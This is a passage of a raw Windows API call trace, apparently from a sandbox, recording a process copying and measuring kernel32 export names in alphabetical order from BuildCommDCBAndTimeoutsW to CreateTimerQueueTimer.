lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.441] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.441] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.441] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.441] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.441] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.441] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.441] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.441] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.441] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.441] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.441] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.441] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.441] lstrlenA (lpString="CANCELIO") returned 8 [0083.441] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.441] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.441] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.442] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.442] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.442] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.442] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.442] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.442] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.442] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.442] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.442] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.442] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.442] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.442] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.442] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.442] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.442] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.442] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.442] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.442] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.442] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.442] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.443] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.443] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.443] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.443] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.443] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.443] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.443] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.443] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.443] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.443] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.443] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.443] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.443] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.443] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.443] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.443] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.443] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.443] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.443] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.444] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.444] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.444] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.444] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.444] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.444] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.444] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.444] lstrlenA (lpString="COPYFILEA") returned 9 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.444] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.444] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.444] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.444] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.444] lstrlenA (lpString="COPYFILEW") returned 9 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.444] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.444] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.444] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.444] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.444] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.444] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.445] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.445] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.445] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.445] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.445] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.445] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.445] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.445] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.445] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.445] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.445] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.445] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.445] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.445] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.445] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.445] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.445] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.445] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.445] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.446] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.446] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.446] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.446] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.446] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.446] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.446] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.446] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.446] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.446] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.446] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.446] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.446] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.446] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.446] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.446] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.446] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.446] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.446] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.447] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.447] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.447] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.447] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.447] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.447] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.447] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.447] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.447] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.447] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.447] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.447] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.447] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.447] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.447] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.447] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.447] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.447] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.447] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.447] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.448] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.448] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.448] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.448] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.448] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.448] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.448] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.448] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.448] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.448] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.448] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.448] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.448] lstrcpyA (in: lpString1=0x3f2d468, 